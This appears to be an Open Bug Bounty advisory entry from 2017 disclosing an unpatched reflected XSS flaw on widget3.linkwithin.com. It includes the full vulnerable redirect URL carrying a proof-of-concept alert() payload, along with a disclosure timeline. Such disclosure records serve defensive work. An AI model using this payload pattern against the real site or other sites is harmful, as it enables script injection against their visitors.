widget3.linkwithin.com XSS vulnerability

2017-05-26T08:32:00
ID OBB:241641
Type openbugbounty
Reporter Random_Robbie
Modified 2017-07-07T09:15:00

Description

Vulnerable URL:
http://widget3.linkwithin.com/redirect?url=http%3A//wagonized.typepad.com/wagonized/2007/05/another_pen_por.html'-alert('OPENBUGBOUNTY')-'&rtype;=&vars;=%5Bnull%2C%20826855%2C%209%2C%20%22http%3A//wagonized.typepad.com/wagonized/2008/05/another-school.html%22%2C%20133373879%2C%200%2C%20133377013%5D&ts;=1472051900000
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check widget3.linkwithin.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 May, 2017 08:32 GMT
Notification sent to subscribers (without technical details)| 26 May, 2017 10:17 GMT
Generic security notifications sent to website owner| 27 May, 2017 04:36 GMT
Vulnerability details disclosed by researcher| 7 July, 2017 09:15 GMT